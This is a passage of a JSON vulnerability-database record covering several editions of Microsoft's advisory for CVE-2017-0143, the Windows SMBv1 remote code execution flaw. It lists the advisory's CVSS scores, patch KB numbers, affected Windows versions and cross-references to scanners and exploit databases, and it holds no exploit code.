"Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-12T06:51:00", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012606", "KB4013429", "KB4012212", "KB4012598", "KB4012213", "KB4012215", "KB3210721", "KB3205401", "KB4012216", "KB3212646", "KB3210720", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB3177186", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T06:51:00", "differentElements": ["msAffectedSoftware"], "edition": 38}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-12T20:49:50", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012606", "KB4013429", "KB4012212", "KB4012598", "KB4012213", "KB4012215", "KB3210721", "KB3205401", "KB4012216", "KB3212646", "KB3210720", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB3177186", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T20:49:50", "differentElements": ["msAffectedSoftware"], "edition": 39}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-12T22:47:20", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 